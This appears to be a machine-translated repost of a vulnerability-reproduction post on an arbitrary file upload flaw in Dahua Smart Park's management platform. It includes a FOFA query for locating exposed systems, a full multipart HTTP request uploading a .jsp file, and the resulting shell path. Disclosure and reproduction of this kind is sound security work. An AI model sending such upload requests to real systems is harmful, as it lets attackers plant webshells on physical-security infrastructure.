Existe una vulnerabilidad de carga de archivos arbitrarios en la plataforma de gestión integral de Dahua Smart Park

Existe una vulnerabilidad de carga de archivos arbitrarios en la plataforma de gestión integral de Dahua Smart Park

Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es sólo para fines educativos.

1. Introducción a la plataforma de gestión integrada Dahua Smart Park

Búsqueda de cuenta oficial de WeChat: Biblioteca de reaparición de vulnerabilidades de Nanfeng Este artículo se publicó por primera vez en la cuenta oficial de la Biblioteca de reaparición de vulnerabilidades de Nanfeng

La plataforma de gestión integral de Dahua Smart Park es una plataforma de gestión integral que integra las funciones de gestión de los cuatro subsistemas de seguridad de video, alarma, control de acceso e intercomunicador.

2. Descripción de la vulnerabilidad

La plataforma de gestión integrada Dahua Smart Park es una plataforma de gestión integral que tiene funciones como operación de parques, asignación de recursos y servicios inteligentes. La plataforma está destinada a ayudar a optimizar la asignación de recursos del parque para satisfacer necesidades de gestión diversificadas y, al mismo tiempo, mejorar la experiencia del usuario proporcionando servicios inteligentes. El dispositivo Dahua Smart Park ha abierto la función de carga de archivos, pero no ha restringido ni filtrado estrictamente el tipo, tamaño, formato, ruta, etc. del archivo cargado, lo que permite a los atacantes construir archivos maliciosos y cargarlos en el dispositivo.

Número CVE:

Número CNNVD:

Número CNVD:

3. Afecta la versión

imagen

4. declaración de consulta fofa

"/WPMS/asset/lib/gridster/"

5. Recurrencia de la vulnerabilidad

Paquete de vulnerabilidad:

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

1657966889
--f3aeb22be281d77542546a2f71e20982--

imagen

Enlace de dirección de Shell: http://127.0.0.1/upload/emap/society_new/ico_res_f61fad3abc99_on.jsp

ico_res_f61fad3abc99_on.jsp se reemplaza con el nombre del archivo que se repite en el paquete de datos cargado

imagen

6.POC&EXP

Siga la cuenta oficial Nanfeng Vulnerability Reproduction Library y responda Vulnerability Reproduction 41 para obtener la dirección de descarga de la herramienta POC:

 

7. Opiniones de rectificación

El fabricante no ha proporcionado el enlace del parche de vulnerabilidad relevante; preste atención a la página de inicio del fabricante para actualizar en cualquier momento: https://www.dahuatech.com/

8. Revisión pasada

Existe una vulnerabilidad de lectura de archivos arbitraria en el sistema de acceso a aplicaciones de Aikesi (Tecnología Tingzhi)

NginxWebUI tiene una vulnerabilidad de ejecución remota de comandos en primer plano

Supongo que te gusta

Origin blog.csdn.net/nnn2188185/article/details/131797947
Recomendado
Clasificación